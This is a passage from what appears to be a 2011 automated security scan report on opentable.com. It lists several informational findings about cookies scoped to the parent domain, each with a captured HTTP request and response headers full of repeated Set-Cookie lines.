Set-Cookie: ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; domain=.opentable.com; path=/
Vary: Accept-Encoding
Content-Length: 64483

document.write("<link href=\"http://www.opentable.com/frontdoor/css/ot_short.css?v=Web_11_10_0_11.prod.com\" rel=\"styleSheet\" type=\"text/css\" /><!--[if IE]><link type=\"text/css\" href=\"http://ww
...[SNIP]...
11.16. http://www.opentable.com/info/aboutus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/aboutus.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /info/aboutus.aspx HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; em=0; pgseq=; s_cc=true; s_nr=1317651726004-Repeat; s_sq=otrestref%3D%2526pid%253Dushome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.opentable.com%25252Finfo%25252Faboutus.aspx%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 14:21:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: restrefwhite=90; domain=.opentable.com; expires=Sat, 03-Oct-1981 07:00:00 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+17%3a21%3a38&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Vary: Accept-Encoding
Content-Length: 18801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head><link href="/styles/Normal/ot_style003.css?ver=Web_11_10_0_
...[SNIP]...
11.17. http://www.opentable.com/interim.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=136; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head><meta http-equiv="content-type" content="text/html; chars
...[SNIP]...
11.18. http://www.opentable.com/jaspers-corner-tap-and-kitchen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jaspers-corner-tap-and-kitchen?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0b0tKkwEp2937edj1JsmX2; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
11.19. http://www.opentable.com/opentables.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
11.20. http://www.opentable.com/restaurant-search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 12:54:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Location: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0; domain=.opentable.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.opentable.com/interim.aspx?rid=90&amp;restref=90&amp;m=4&amp;t=single&amp;p=2&amp;d=10/3/2011 7:00 PM&amp;
...[SNIP]...
11.21. http://www2.ncl.com/  previous  next

Summary

